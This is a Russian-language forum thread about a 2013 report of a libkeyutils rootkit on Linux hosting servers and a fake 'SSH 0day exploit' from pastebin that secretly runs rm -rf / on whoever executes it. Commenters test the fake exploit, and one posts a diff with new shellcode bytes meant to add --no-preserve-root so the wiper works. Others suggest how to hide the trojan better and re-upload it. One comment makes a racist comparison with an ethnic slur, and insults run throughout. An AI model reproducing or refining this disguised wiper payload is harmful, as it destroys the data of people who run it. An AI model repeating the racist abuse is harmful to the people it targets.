> вообще да, но иногда хочется попророчить :-)В наших реалиях медия - это всё. Важно не то, что было на самом деле, а то, что об этом говорят.
Захотели опустить редхат - собрались и пустили слух. Затраты - копеечные, прямая выгода небольшая, но косвенную вообще не посчитаешь. Надо будет за курсом акций RH посмотреть, отразится ли это как-то. Если отразится, то, как говорили древние, "ищи, кому выгодно".
>> вообще да, но иногда хочется попророчить :-)
> В наших реалиях медия - это всё. Важно не то, что было
> на самом деле, а то, что об этом говорят.
> Захотели опустить редхат - собрались и пустили слух."Иногда сигара — это просто сигара" (с)
>> В наших реалиях медия - это всё. Важно не то, что было
>> на самом деле, а то, что об этом говорят.
>> Захотели опустить редхат - собрались и пустили слух.
> "Иногда сигара — это просто сигара" (с)Меня тоже не интересует, как было на самом деле. Меня интересует, что мешает это сделать? Что мешает гадить в репутацию своему конкуренту, пользуясь сомнительными схемами? Пятно на репутации? Да там этих пятен столько, что незапятнанное место найти сложно.
Иногда капиталист - тоже человек, но когда он слышит про деньги, можно об этом смело забыть.
Даже если поверить в то, что широкие массы приходят, чтобы тратить на дискредитацию конкурентов сотни часов в месяц БЕСПЛАТНО, то почему бы не использовать эти ресурсы, которые сами идут в руки? Врождённое чувство благородства, что ли? Тогда где они были тогда, когда их за руку ловили?
> только redhat-based системы.А есть уверенность что только их? Просто хостеры по неким причинам их лю.
>> Наличие панелей говорит о том, что владельцы - вендузятники.
> 1. Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?
> 2. то 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование косвенно подверждает малолетний баттхёрт :)
> 3. Я не про биологический возраст, а про психологический.
> 4. Именно максималистские лозунги и делают обсуждения непродуктивными.
> 5. Я понимаю Ваше желание многословно и витиевато изливать мысли, но давайте вернёмся на бренную землю.
> 6. Мне кажется, что в данном случае надо просто подождать, пока не разберутся и не найдут уязвимость, и уже потом делать выводы.
> 7. "Иногда сигара — это просто сигара" (сНет, ты.
клоун, на себя бы посмотрел сначала
>> Наличие панелей говорит о том, что владельцы - вендузятники.
> Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?Вендузоида легко "обидеть", как и негра. Негру скажи, что он негр - обидится. Вендузоиду скажи, что он вендузоид - тоже обидится. Вот такие они (негры и вендузоиды) странные. Проэтому приходится смягчать факти и говорить негру, что он "чёрный, африканец", а вендузоиду, что он "хомячок, придурок, идиот", чтобы хоть как смягчить факты и так их (негров и вендузоидов) "не расстраивать".
> Вендузоида легко "обидеть", как и негра. Негру скажи, что он негр -
> обидится. Вендузоиду скажи, что он вендузоид - тоже обидится.99.99 % из них просто не обратят на это внимание и не поймут о чем вообще им хотят сказать.
тред на вебхостинге доставляет.
I have found out that removing /lib/libkeyutils.so.1.9 breaks python (therefore yum too) and named server.
Quote:
Service: nameserver
Notification Type: failed
Notification: nameserver failed @ Tue Feb 19 10:16:02 2013. A restart was attempted automagically.
Service Check Method: [check command]
Number of Restart Attempts: 4
Service Check Raw Output:named is not running
Startup Log:
Starting named: /usr/sbin/named-checkconf: error while loading shared libraries: libkeyutils.so.1: cannot open shared object file: No such file or directory
/etc/init.d/named: line 57: [: too many arguments
[FAILED]
After i put back lib file, it started ok and python/yum started to work normally.
So is this a false positive notification from CSF or?чо-то слабенько, надо было сразу от корня все выжигать. кстати, товарища с libnss3 в корне это тоже касается.
ссссссссцу^W, кто ж им права выдает, а?
Вендузятнике же.
> I have found out that removing /lib/libkeyutils.so.1.9 breaks pythonИ тут из демонической личности взломщика начинают лезть такие конкретные человеческие уши arisu :)
Что ж они кернель так сразу не прибили-то? ЧТоб проблем не было...
Вот что-то такое и бывает когда виндузятник из своего putty.exe админит линь или бзды. Там же и привкеи тырят.
> Вот что-то такое и бывает когда виндузятник из своего putty.exe админит линь
> или бзды. Там же и привкеи тырят.iptables -I INPUT -p tcp -m osf --genre Windows --ttl 2 -j DROP
должно стать дефолтом для всех серверов с linux. :)
если добавить --dport 22 - вполне разумная мера, кстати.
automagically ???
"Среди атакованных систем также отмечаются серверы с системой обновления ядра ksplice и серверы с sshd на нестандартном порту."
sshd на нестандартном порту? это на что намек?
> sshd на нестандартном порту? это на что намек?На то, что это не тупой переборщик sshd. Что это или вообще не ssh, или переборщик грамотный (умеет в настройках putty.exe порт прочитать).
Переборщики портов теперь проверяют наличие putty.exe на машине и тащат оттуда по глупости сохраненный пасс?И все же причем тут нестандартный порт в новости?
> Переборщики портов теперь проверяют наличие putty.exe на машине и тащат оттуда по
> глупости сохраненный пасс?Это способ 'взлома linux', проверенный временем. :)
> И все же причем тут нестандартный порт в новости?Переборщик ломился бы только по стандартному, брезгуя теми избранными, кто порт поменял.
Блин, ну я таких тонкостей про переборщик (от слова перебирать) не знал(((
А по существу, где связь-то нестандартности порта и масс взлома?Там еще овер 100500 пакетов стоит с правленными конфигами, их тоже в чем-то подозревать?
> Там еще овер 100500 пакетов стоит с правленными конфигами, их тоже в
> чем-то подозревать?Тамбовский гейм тебе овер.
Спасибо за исчерпывающий ответ.
а никто еще это файл не дизассемблировал и не сравнил с оригиналом (ну или чем-то, похожим на оригинал) ?
Зачем? Мы автора петициями закидаем, пусть исходники открывает.
Хм, что то я не могу найти ссылок кого именно взломали. Может взом не такой и массовый и кто-то просто натырил сертификатов/паролей от путти?
> Хм, что то я не могу найти ссылок кого именно взломали. Может
> взом не такой и массовый и кто-то просто натырил сертификатов/паролей от
> путти?Ложечки найдутся, а строчка в "get the facts" останутся. Уже никто не будет помнить, что, кого, но сам факт запомнится. :)
Какой факт?
> Какой факт?Которые 'большой бизнес' для своих 'get the facts' лепит из сплетен, слухов и подозрений, помноженных на отчаянную неправду. :)
Вы про "MS get the facts" на который всем пофиг?
> Вы про "MS get the facts" на который всем пофиг?Я про слухи. "Это тот red hat, который недавно крупно поломали?". Хотя никого так и не поломали.
Вон, про debian и openssl до сих пор несколько раз в неделю темы всплывают.
Кому пофиг? Тем, кому нужно принимать решения ещё до того, как они станут экспертами, и которые используют для этого решения все источники информации, включая массовые слухи? Нельзя стать экспертом в чём-либо, сначала не выбрав это что-то. И этот выбор должен быть обоснован. И тут любая мелочь играет роль.
>> Вы про "MS get the facts" на который всем пофиг?
> Я про слухи. "Это тот red hat, который недавно крупно поломали?". Хотя
> никого так и не поломали.если у тебя взлома не было - не значит что его нет совсем.
> Вон, про debian и openssl до сих пор несколько раз в
> неделю темы всплывают.А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?
> если у тебя взлома не было - не значит что его нет совсем.Логично. Однако нет вообще никаких сведений о том WTF, собственно. Что не мешает гражданину с характерным ником растопыривать пальцы веером.
> А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?
Оно конечно правда, однако было весьма давно. Кроме того, изменения были заапрувлены авторами openssl, так что к ним не меньше вопросов чем к самим дебианщикам. Вообще, людям свойственно ошибаться. И если не хочется наступать на ошибки в софте - есть только 1 способ это сделать: вернуться назад в пещеры и не пользоваться софтом вообще. Вот тогда будет хорошо.
>> если у тебя взлома не было - не значит что его нет совсем.
> Логично. Однако нет вообще никаких сведений о том WTF, собственно. Что не
> мешает гражданину с характерным ником растопыривать пальцы веером.что там происходит - не знает никто. Хотя более чем 1 человек работают над тем что бы понять.
Хуже что многие начали избавляться от руткита - и в результате машины остались без следов.
А что вам мой ник?:) когда тут ходят с bsd rip и забивают этим форум - это не страшно, а тут вам мой ник помешал :-)>> А что не правда? Ребята из Debian не сделали так что аукнулось охренному количеству серверов?
> Оно конечно правда, однако было весьма давно. Кроме того, изменения были заапрувлены
> авторами openssl, так что к ним не меньше вопросов чем кнасколько я помню - все было с точностью до наоборот. OpenSSL team толи икто не спросил, толи тихо влил себе изменения - после таймаута на ответ с их стороны.
> самим дебианщикам. Вообще, людям свойственно ошибаться. И если не хочется наступать
> на ошибки в софте - есть только 1 способ это сделать:
> вернуться назад в пещеры и не пользоваться софтом вообще. Вот тогда
> будет хорошо.ЭЭ.. цена ошибки только разная. Что говорит о том что отвественности - не на грошь.
Как и компетентности тех кто это делает.
> Кроме того, изменения были заапрувлены авторами opensslэто ложь. которую я уже настолько заколебался опровергать, что и линки потёр. сказано авторами было примерно такое: «да, если вам мешает отлаживаться — можете закомментарить, ничего страшного». любое вменяемое существо (ну, кроме маинтайнера бебиана, там проблемы со вменяемостью) это понимает как «ничего страшного, *для отладки сойдёт*». где тут карт-бланш на те же действия в релизном варианте — знает только «гав-гав-комьюнити» бебиана, которое облило грязью всех, кого смогло.
>> Кроме того, изменения были заапрувлены авторами openssl
> это ложь. которую я уже настолько заколебался опровергать, что и линки потёр.
> сказано авторами было примерно такое: «да, если вам мешает отлаживаться —
> можете закомментарить, ничего страшного». любое вменяемое существо (ну, кроме маинтайнера
> бебиана, там проблемы со вменяемостью) это понимает как «ничего страшного, *для
> отладки сойдёт*». где тут карт-бланш на те же действия в релизном
> варианте — знает только «гав-гав-комьюнити» бебиана, которое облило
> грязью всех, кого смогло.ооо.. я в кой веки соглашусь с artsu.
а это нормально ?
-rw-r--r-- 1 root root 10224 2009-11-05 11:48 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2010-11-08 13:32 libkeyutils.so.1 -> libkeyutils-1.2.so
> а это нормально ?
> -rw-r--r-- 1 root root 10224 2009-11-05 11:48 libkeyutils-1.2.so
> lrwxrwxrwx 1 root root 18 2010-11-08 13:32 libkeyutils.so.1 ->
> libkeyutils-1.2.soНормально.
Джо так и не поймали.Больше похоже, что "в сети зафиксирован массовый психоз на почве взлома серверов на linux".
http://pastebin.com/WgXrebLqА вот в чем дело! о_О
> http://pastebin.com/WgXrebLq
> А вот в чем дело! о_Озабавно
а точно он?SSH 5.3 remote root 0day exploit
By: favoriter6 on Jan 18th, 2013Сегодня февраль. Не 21-е, как по теме выше, но тоже близко.
> http://pastebin.com/WgXrebLq
> А вот в чем дело! о_Остранный скрипт.
просит указать <target> и <port> в качестве переменных ``argv``...
но при этом так и НЕ использует эти ``argv`` :-)
>> http://pastebin.com/WgXrebLq
>> А вот в чем дело! о_О
> странный скрипт.
> просит указать <target> и <port> в качестве переменных ``argv``...
> но при этом так и НЕ использует эти ``argv`` :-)Ага. "Новость о взломе - поломано 50 компьютеров".
"Эксплоит, тестирующий по поводу новости о взломе - поломано 50000 компьютеров".
А что он делает, на глаз можете определить?
Вообще-то нормальная практика - оторвать кусок, чтобы совсем уж скрипткиддисы не гоняли
не, там какая-то невнятная муть, судя по всему.
вот это вот - (*(void(*)())decoder)(); - как-то совсем не радует
> не, там какая-то невнятная муть, судя по всему.
> вот это вот - (*(void(*)())decoder)(); - как-то совсем не радуетДа вообще не стоит сомнительную муть из интернета самому компилировать и запускать. Здесь вам не тут!
Ну, на то и виртуалки. И, кстати, результат забавный:[alex@host ~]$ sudo ./a.out 10.0.0.1 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
/bin//rm: it is dangerous to operate recursively on `/'
/bin//rm: use --no-preserve-root to override this failsafe
[alex@buzzalex ~]$
> Ну, на то и виртуалки. И, кстати, результат забавный:
> [alex@host ~]$ sudo ./a.out 10.0.0.1 22
> MIKU! MIKU! MIKU!
> [-] Exploit failed.
> /bin//rm: it is dangerous to operate recursively on `/'
> /bin//rm: use --no-preserve-root to override this failsafe
> [alex@buzzalex ~]$//fixed
--- coolxploit.c 2013-02-19 20:00:56.084967001 +0200
+++ coolxploit_fix.c 2013-02-19 20:13:16.276967001 +0200
@@ -29,15 +29,11 @@
exit(1);
}
-unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
- "\x6a\x2f\x89\xe7\x52"
- "\x66\x68\x2d\x66\x89"
- "\xe6\x52\x66\x68\x2d"
- "\x72\x89\xe1\x52\x68"
- "\x2f\x2f\x72\x6d\x68"
- "\x2f\x62\x69\x6e\x89"
- "\xe3\x52\x57\x56\x51"
- "\x53\x89\xe1\xcd\x80";
+unsigned char decoder[]= "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08"
+ "\x89\x5e\x1f\x89\x46\x23\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x23\xcd"
+ "\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f\x72\x6d\x4f\x2d\x2d\x6e"
+ "\x6f\x2d\x70\x72\x65\x73\x65\x72\x76\x65\x2d\x72\x6f\x6f\x74\x4f\x54"
+ "\x4f\x52\x41\x54\x4f\x52\x41\x54\x4f\x52\x41";
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
"\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
Добавил ключик, что ли? :-)
> Добавил ключик, что ли? :-)ага. щас проверил, оно, правда, нифига не работает, но мне уже лень разбираться, где я с офсетами напортачил.
фатя, и так полчаса убил, сочиняя на авке эскейпирование опкодов из дампа.
Дожили, скрипткидисы даже ремувалку файлов засунуть в payload уже нормально не могут.
> странный скрипт.Анализ странного скрипта, или немного гуглинга по правильным кейвордам: http://www.tamonten.com/how-not-to-exploit-a-box
Категорически не советую запускать: судя по всему там попросту замаскированный под пенек rm -rf / aka попытка в 100500-й раз натянуть скрипткидизов возомнивших себя крутыми.
да, забавная действительно штука :) , с научной точки зрения..
> да, забавная действительно штука :) , с научной точки зрения..Правда писали это такие же долбодятлы как те на которых он ориентирован. Ну то-есть, payload там кривой и не работает нифига. Что за люди, даже систему раздестроить нормально не могут :).
А вообще на месте этих кидей я бы лучше в payload'е открывал шелл к ... локалхосту :). А дальше пусть кидис сам себя и хакает наздоровье. Готов поспорить, немало киддей удивилось бы результату хака. Так что если кто хочет натянуть очередную порцию кидисов - дарю идею! :)
> А дальше пусть кидис сам себя и хакает наздоровье.первую команду которую он введёт -- наверняка как раз и будет ---- rm -vRf /*
:-D
действительно -- этот план на много лучше :)
"exploit" такой "exploit"Для малолетних идиотов would-be-script-kiddies: этот c'ник ничего не ломает, а вот на вашей системе он выполняет
rm -rf /
// b.
> "exploit" такой "exploit"
> Для малолетних идиотов would-be-script-kiddies: этот c'ник ничего не ломает, а вот на
> вашей системе он выполняет
> rm -rf /
> // b.Мы потихоньку догадалсь.
В linux пришли привычки, которые смогут поломать даже самую крепкую защиту. Смотришь на местных виндузятников, и думаешь "а вдруг им такие же доверят что-то для меня важное, что же делать тогда?".Скоро придётся строить свой интернет.
вообще-то он это делает только если не добавить убитую строку, копирующую имя хоста в переменную host.
А вот детальный разбор этой штуки: http://www.tamonten.com/how-not-to-exploit-a-box
И чо? Нашел жертву с "OpenSSH_5.1p1 Debian-5, OpenSSL 0.9.8g 19 Oct 2007", скомпилял эту хрень (заметим, там в коде кондовые баги типа отсутствия разбора argv[], это даже я ни-разу-не-программист вижу). Натравил (поправив в меру разумения), волшебный сокет не открывается.
Вас обманули! (с) ;)
Ммм... Оказывается, исправив кривизну, проскочил самое вкусное ;)
Однако, "rm -Rf /" давно несовременно, теперь пишут "rm -Rf /*" для нужного результата (в sysutils тупо затычка)
> нужного результата (в sysutils тупо затычка)Ну, нерабочий kiddie pwner у кого-то получился. Тот кто его писал тоже был ж@поруким, что поделать :)
>> нужного результата (в sysutils тупо затычка)
> Ну, нерабочий kiddie pwner у кого-то получился. Тот кто его писал тоже
> был ж@поруким, что поделать :)жалко конешно что исправленную версию -- так ни кто и не закачал обратно на http://pastebin.com :-)
под словом "исправленную" -- я конешно же имею ввиду:
* чтобы ``rm -Rf /*'' отрабатывалось как надо
* чтобы не палевно:
** разбор ``argv''
** разделение-на-составные-части и сокрытие-частей-внутри-сторонних-функций ``(*(void(*)())decoder)()''
* чтобы x86_64/x86_32 нормально работало (наверно придётся для этого готовить две разные константы блоба)
(*(void(*)())decoder)();аккуратнее нужно было прятать, а так мне нравится ваш decoder со строчкой на пёрле
> (*(void(*)())decoder)();
> аккуратнее нужно было прятать, а так мне нравится ваш decoder со строчкой
> на пёрлеох я и медленный оказывается...
snort-ом не пользуются чтоль?
не волнуйтесь, Кашперский уже спешит на помошь!
> snort-ом не пользуются чтоль?
> не волнуйтесь, Кашперский уже спешит на помошь!Ты Snort хоть раз настроить и хотя бы месяц посопровождать НЕ НА ЛОКАЛХОСТЕ пробовал?
конечно нет,
но я видел фотку обложки книжки по snort-у
проверил на виртуалке# ./ssh_expl 192.168.207.51 22
MIKU! MIKU! MIKU!
[-] Exploit failed.
Segmentation faultна 192.168.207.51
# uname -a
Linux test.example.net 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:42:30 EST 2012 i686 i686 i386 GNU/Linux# ssh -v
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008ЧЯДНТ?
> ЧЯДНТ?библиотека key.1.9 появилась? :)
а зачем, exploit failed это отвлекающий маневр, но всем по фиг
> а зачем, exploit failed это отвлекающий маневр, но всем по фигОн реально failed, я запустил в виртуалке
1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]
>> а зачем, exploit failed это отвлекающий маневр, но всем по фиг
> Он реально failed, я запустил в виртуалке
> 1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]под рутом надо было ггг
>>> а зачем, exploit failed это отвлекающий маневр, но всем по фиг
>> Он реально failed, я запустил в виртуалке
>> 1[31250]: segfault at 8049160 ip 08049160 sp bfb7408c error 15 in 1[8049000+1000]
> под рутом надо было гггА я под рутом и запустил, что мне, жалко контейнер что ли? :)
> под рутом надо было гггДа он даже под рутом failed - кидисы payload написали горбато, увы.
$ ls -la /lib/libkeyutils.so.1*
lrwxrwxrwx 1 root root 18 Май 28 2012 /lib/libkeyutils.so.1 -> libkeyutils.so.1.3
-rw-r--r-- 1 root root 8528 Апр 4 2010 /lib/libkeyutils.so.1.3# dpkg --search /lib/libkeyutils.so.1.3
libkeyutils1: /lib/libkeyutils.so.1.3$ uname -a
Linux mail 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux$ cat /etc/debian_version
6.0.6
У меня точно также и что это значит? Всё штатно?
Судя по http://stackoverflow.com/questions/14164552/keyctl-commands-... руткит в сети сильно дольше чем три дня.
А смотря на "репорты" хакнутых, и попытки решить проблему без переустановки зарученого хоста, ломают полных нубов.
Подозреваю что "хакнуты" они были самыми разными способами, едва ли это проблемы дистрибутива.
Уважаемые гуру.А кто ВИДЕЛ в сети сообщения,что попали под это Debian || Ubuntu?
> библиотека key.1.9 появилась? :)на 192.168.207.51 ничего не появилось
# cd /lib/
# ls -la libkeyutils*
-rwxr-xr-x 1 root root 7880 Jan 6 2007 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 Apr 15 2011 libkeyutils.so.1 -> libkeyutils-1.2.so# rpm -qf libkeyutils-1.2.so
keyutils-libs-1.2-1.el5# rpm -qf libkeyutils.so.1
keyutils-libs-1.2-1.el5
Малоизвестная компания http://solidshellsecurity.com/ поставляет коммерческие решения якобы защиты для Windows (!!), а также услуги хостинга. Публикует сущую дичь о высосаннных из пальца проблемах (которых нет на самом деле), чем вызывает многостраничные обсуждения подготовленных и умных людей.Удивляюсь вам, господа.
Ссылка в новости не имеет значения, эта тема обсуждается на web hosting talk, форумах cpanel, directadmin и миллионе других ресурсов разной степени желтизны. Тащемто, я, например, лично видел сервер с этим руткитом.
"Steven - sorry for being unclear. I didn't mean to imply the initial attack was from ssh; what I meant was that an iptables block on ssh stopped them reconnecting, exactly as you've seen.
Is the following consistent with what you've seen?1. User account compromised at PHP level
2. Compromised account used to hack root and backdoor sshd via libkeyutils
3. Spam sentThe question being, how is the #2 root hack being done, #1 could be through any vulnerable site CMS etc.
"
http://www.webhostingtalk.com/showthread.php?t=1235797
Я думаю этот кусок причинной ветки новости все проясняет для профессиональных администраторов. Нельзя пускать "php" "web-софт" на системный уровень. ИМХО. Мои клиента на "панель" не ходят :-)
Опять PHP! Еще лет пять назад эталоном дырявого софта был phpmyAdmin . Проходят годы, а поделки на php остаются дырявыми. Разработчике говорят "А че вы хотели мы делали php для домохозяек".
Что-то мне кажется, что опять с виндозных машин пассворды поутаскивали. Слишком уж специфична ЦА - хостеры с панельками...
Почему тогда ни одного писка про дебианы/убунты? Их у таких хостеров поменьше - но хоть кто-то же должен был нарваться? Если б не это - я бы и сам решил, что опять вор паролей какой-то...
Потому что под убунты библиотека с руткитом по другому называется?)
Всё равно хай уже б стоял...
dlink.ru как раз 3 дня назад сломался, ftp До сих пор не доступен
Ты не справедлив. Можешь зайти на ЛЮБОЙ сайт типа БРЭНД.ru и почувствовать разницу с БРЭНД.com
> Ты не справедлив. Можешь зайти на ЛЮБОЙ сайт типа БРЭНД.ru и почувствовать
> разницу с БРЭНД.comburatino.ru : отправь sms на номер ....
buratino.com : your site name, your slogan, failed to load module news
Разницу действительно почувствовал. Жаль только, ни на одном из этих сайтов нет ни слова о чудесном напитке. :)
они подтвердили что не работал.
> dlink.ru как раз 3 дня назад сломался, ftp До сих пор не доступенulmart.ru тоже ломался. Вот только причина куда как прозаичнее: эти сказочные долбо...бы забыли оплатить домен. Хотя интернет магазин и система резервирования - по сути единственное за что приходят к ним а не конкурентам. Вот так вот оно у нас и бывает - платить за домен бегут когда петух клюнул и сайт уже упал...
> ulmart.ru тоже ломался. Вот только причина куда как прозаичнее: эти сказочные долбо...бы
> забыли оплатить домен. Хотя интернет магазин и система резервирования - по
> сути единственное за что приходят к ним а не конкурентам. Вот
> так вот оно у нас и бывает - платить за домен
> бегут когда петух клюнул и сайт уже упал...Все проще - наши сказочные долбо@#ы запрещают продление домена более, чем на год. Нет, автопродление конечно же есть... Но вот авансовое продление отсутствует, как факт.
Вот и утро, вот и новый день. Ну что, у этого фантома появился хотя бы файлик?
[root@xxx]# uname -a
Linux xxx.xxx 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux[root@xxx]# cat /etc/redhat-release
CentOS release 6.3 (Final)Наружу торчит bind, exim, dovecot и nginx
Вроде все чисто, левых файлов нет.
> [root@xxx]# uname -a
> Linux xxx.xxx 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
> x86_64 x86_64 GNU/Linux
> [root@xxx]# cat /etc/redhat-release
> CentOS release 6.3 (Final)
> Наружу торчит bind, exim, dovecot и nginx
> Вроде все чисто, левых файлов нет.Пока, кроме СОМНИТЕЛЬНОГО товарища с Ubuntu, мы так и не увидели ни одного пострадавшего. Как и самого файлика со спамботом. Если сначала казалось, что это какая-то безалаберность, то сейчас кажется, что это вообще фейк. Массовый взлом, о котором все знают, но никто своими глазами не видел.
http://www.webhostingtalk.com/showpost.php?p=8565992&postcou..."The software versions all seem the same (i havent delved too deep yet, but a cursory glance indicates this to be so). The main difference that I can see is the php version on the infected machine is 5.3.21, with XCache and the other two VMs run 5.3.18 without XCache." - судя по всему у товарищей подключены левые репы, типа епеля.
Версия PHP из официальных репов:
[root@xxx]# php -v
PHP 5.3.3 (cli) (built: Jul 3 2012 16:53:21)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
> http://www.webhostingtalk.com/showpost.php?p=8565992&postcou...
> "The software versions all seem the same (i havent delved too deep
> yet, but a cursory glance indicates this to be so). The
> main difference that I can see is the php version on
> the infected machine is 5.3.21, with XCache and the other two
> VMs run 5.3.18 without XCache." - судя по всему у товарищей
> подключены левые репы, типа епеля.Кроме этого вебхостингтолка, эту проблему кто-нибудь вообще видел? Может быть, там в сам этот вебхостингтолк и встроен какой-нибудь javascript-вирус для похищения паролей? :)
>> http://www.webhostingtalk.com/showpost.php?p=8565992&postcou...
>> "The software versions all seem the same (i havent delved too deep
>> yet, but a cursory glance indicates this to be so). The
>> main difference that I can see is the php version on
>> the infected machine is 5.3.21, with XCache and the other two
>> VMs run 5.3.18 without XCache." - судя по всему у товарищей
>> подключены левые репы, типа епеля.
> Кроме этого вебхостингтолка, эту проблему кто-нибудь вообще видел? Может быть, там в
> сам этот вебхостингтолк и встроен какой-нибудь javascript-вирус для похищения паролей?
> :)на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.
> на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.Не напрягайся. Начни с азбуки и арифметики. Лет через 17, глядишь, поймёшь, о чём тут вообще люди разговаривают. Хватит так откровенно тупить.
Фишка в том, что для тебя, клоун, это последняя соломинка сохранить хоть 1% лица, типа "ох, linux сломали, значит свободные системы небезопасные". При этом мы даже этих фактов не дождались. А о сохранении лица тут и речи быть не может.
Нас же, которые понимают, что свободные системы всегда будут безопаснее, и даже понимают, ПОЧЕМУ это так, интересуют совсем другие вопросы: кто устраивает эту клоунаду, зачем, чего ждать дальше и чем это может грозить простым людям. На объект вашего дежурного онанизма нам, простым людям, если честно, абсолютно наплевать. Даже если пятьсот тысяч человек с этими решетопанелями сломали, суть от этого нифига не изменится. Ну поймёт пятьсот тысяч человек, что "свободное не защищает меня от меня, это ужасно!", всем будет только лучше.
И хватит уже вести себя как престарелая девственница, и вообще - перестаньте дрочить, когда я с вами разговариваю.
>> на сайтах хостинг панелей. Но для тебя буратинушка - это сильно сложно.
> Не напрягайся. Начни с азбуки и арифметики. Лет через 17, глядишь, поймёшь,
> о чём тут вообще люди разговаривают. Хватит так откровенно тупить.
> Фишка в том, что для тебя, клоун, это последняя соломинка сохранить хоть
> 1% лица, типа "ох, linux сломали, значит свободные системы небезопасные". При
> этом мы даже этих фактов не дождались. А о сохранении лица
> тут и речи быть не может.не все свободные. А только Linux не безопасен. Как бы ты буратинушка не кичился своей элитарностью :-)
Как выясняется GNU GPL никак не защищает от проблем с безопастностью.
И наоборот показывает то о чем твердили миру - как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают. А милионы глаз якобы смотрящих в код не защищает.Защищает или прямые руки в настройке или малоизвестность. Остальное ... это только мечты.
> как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают...разумеется только в том в случае, если получится взломать :)
а если владелец системы является НЕ ТЕОРЕТИКОМ-ФИЛОСОФОМ ("мы все погибнем! следовательно ничего не нужно делать!!") -- то он должен задуматься об факторах которых понизят вероятность взлома.
отсутствие проприетарщины -- это конешно же главный (но не единственный) такой фактор!
>> как только система начнет представлять хоть какой-то комерческий интерес для взломщиков - ее взломают
> ...разумеется только в том в случае, если получится взломать :)не бывает не ломаемых систем - бывает дорогой взлом.
такие слова были у взломщиков систем защит еще в 90х - если сумма которую получат за взлом меньше чем потраченые ресурсы - система не ломаемая. остальное - читаем сначала фразу.
Вы еще попробуйте доказать постулат что не бывает ошибок в программе.
Я с удовольствием послушаю
> а если владелец системы является НЕ ТЕОРЕТИКОМ-ФИЛОСОФОМ ("мы все погибнем! следовательно
> ничего не нужно делать!!") -- то он должен задуматься об факторах
> которых понизят вероятность взлома.
> отсутствие проприетарщины -- это конешно же главный (но не единственный) такой фактор!главный ?! ага, ботнет из dlink, вот теперь из sshd - без пропринетаршины. И это называется главным фактором ?:)
Только я вижу сдесь рекламу челябинского ISPmanager ?
> Только я вижу сдесь рекламу челябинского ISPmanager ?Не знаю, что это за менеджер такой, но вот чего я не вижу, так это какого-то осязаемого взлома. Второй день жду хоть чего-нибудь.
Также я не вижу здесь маздая и кефирчика: а уж им бы точно доложили и на передовую отправили.
маздай - это linux must _RIP_? Так он тут давно.
> маздай - это linux must _RIP_? Так он тут давно.Зачем он здесь?
>> маздай - это linux must _RIP_? Так он тут давно.
> Зачем он здесь?А ты зачем? от твоего потока сознания толку не много. только безудержная вера в столмана.
Задайте гуглю запрос
intitle:"index of:" libkeyutils.so.1.9
> Задайте гуглю запрос
> intitle:"index of:" libkeyutils.so.1.9И. И что эти результаты означают? Что троян переписывает конфиг веб-сервера и делает полную копию, а google бегает за ним и переиндексируют. Если вы даёте такие данные, то и объясняйте, как их следует трактовать и какие выводы тут можно сделать - пока просто непонятно, к чему это?
Ты или даун или толстый тролль. Чувак тебе объясняет где взять копию либки которую ты тут клянчишь.
> Ты или даун или толстый тролль. Чувак тебе объясняет где взять копию
> либки которую ты тут клянчишь.Чувак не мне отвечал. И либу по ссылкам я не нашёл, хотя я только несколько штук обошёл.
Но мне интересно, что значит одинаковое название каталога почти везде. Троян делает симлинк рута куда-то в область веба?
Мне кажется, что это пахнет очередным серьёзным ударом по апачепыхерам с их "что вижу, то и пою". Если, конечно, фейком не окажется. Хотя, когда репутация минусовая, хуже уже не будет, доказано и виндой, и пыхом - там хоть каждый день ломай. Вот если бы все трояны для всех систем, дружно взявшись за руки, в один день устроили бы тотальное уничтожение всех данных на всех дисках, может быть, это заставило бы задуматься.
А данный случай - вообще какая-то нелепость. Никто ничего не знает, никто ничего не видел, никто проблему не локализовал, зато рассуждают о каких-то материях, как будто opensource стал внезапно хуже закрытых приложений по защищённости.
дарю ссылки на живую либу.
http://ru-linux.livejournal.com/2917308.html#comments
ты действительно считаешь ниже своего достоинства пользоваться поисковиком?
Кто-нибудь видел чудо сие?
Куда-нибудь может положить его?
> Кто-нибудь видел чудо сие?
> Куда-нибудь может положить его?Я уже два дня подобным вопросом мучаюсь. У меня вообще иногда подозрение, что это фейк какой-то, а не как обычно (украли пароли у пользователей windows через windows-троян, и весь взлом - благодаря нашей любимой самой безопасной и защищённой ОС).
